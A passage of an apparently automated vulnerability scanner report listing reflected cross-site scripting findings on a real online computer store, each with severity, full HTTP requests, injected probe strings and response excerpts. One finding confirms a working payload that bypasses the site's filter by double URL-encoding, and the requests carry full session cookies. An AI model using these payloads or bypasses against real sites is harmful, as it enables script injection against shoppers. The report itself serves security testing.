Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; 
s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:09:43 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:09:43 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:09:43 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 222796

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
<!--
function readReviewsLink() {
return "javascript:retrieveURL('http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=storefronts&landing=desktopsb92ce";97ca51096cb&category=p7xt_series&subcat1=rts&product_code=BV704AA%23ABA&catLevel=3&mc=&ajaxCall=true&tab=reviews', 'ProductContent');javascript:tabControl('pdp_reviewsTab_on');javascript:currentTab('reviews');";

...[SNIP]...

1.44. http://www.shopping.hp.com/webapp/shopping/product_detail.do [mc parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the mc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b15f6"%3b31ab6ba7d14 was submitted in the mc parameter. This input was echoed as b15f6";31ab6ba7d14 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=b15f6"%3b31ab6ba7d14&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; 
s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:10:40 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:10:41 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:10:41 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 224578

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
n "javascript:retrieveURL('http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=storefronts&landing=desktops&category=p7xt_series&subcat1=rts&product_code=BV704AA%23ABA&catLevel=3&mc=b15f6";31ab6ba7d14&ajaxCall=true&tab=reviews', 'ProductContent');javascript:tabControl('pdp_reviewsTab_on');javascript:currentTab('reviews');";
}
//-->
...[SNIP]...

1.45. http://www.shopping.hp.com/webapp/shopping/product_detail.do [mc parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the mc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71aa8"%20a%3db%20b053a1c60d2 was submitted in the mc parameter. This input was echoed as 71aa8" a=b b053a1c60d2 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=71aa8"%20a%3db%20b053a1c60d2&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; 
s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:10:37 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:10:37 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:10:37 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 224626

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
f="javascript:retrieveURL('http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=storefronts&landing=desktops&category=p7xt_series&subcat1=rts&product_code=BV704AA%23ABA&catLevel=3&mc=71aa8" a=b b053a1c60d2&ajaxCall=true&tab=reviews', 'ProductContent');javascript:tabControl('pdp_reviewsTab_on');javascript:currentTab('reviews');" title="javascript:retrieveURL('http://www.shopping.hp.com/webapp/shopping/pr
...[SNIP]...

1.46. http://www.shopping.hp.com/webapp/shopping/product_detail.do [omniData parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the omniData request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 549e5%2527%253balert%25281%2529%252f%252f9d266d5f0bd was submitted in the omniData parameter. This input was echoed as 549e5';alert(1)//9d266d5f0bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the omniData request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData=549e5%2527%253balert%25281%2529%252f%252f9d266d5f0bd HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; 
s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:12:51 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkpgtuW3gh8MCnpuVDWeQyYm2vi&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777709; expires=Friday, 20-Jan-2012 01:12:52 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:12:52 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 224427

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
ull && addlAccount.length>0)ns+=","+ addlAccount; void(s_gs(ns));
}


if (window.hpmetrics == null) { window.hpmetrics = {}; }
window.hpmetrics.isearch = {
'search_term' : '549e5';alert(1)//9d266d5f0bd',
'search_referrer' : '[Exception in:/shopping/product_detail/product_detail.jsp] Index: 1, Size: 1

</div>
...[SNIP]...

1.47. http://www.shopping.hp.com/webapp/shopping/product_detail.do [storeName parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The value of the storeName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 326dc'%3bb71c7de3e6a was submitted in the storeName parameter. This input was echoed as 326dc';b71c7de3e6a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store326dc'%3bb71c7de3e6a&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; 
s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:09:30 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:09:30 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:09:30 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 224690

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
ni_category == '' || omni_category == 'null')
omni_category = '';
else if(omni_category == 'handhelds')
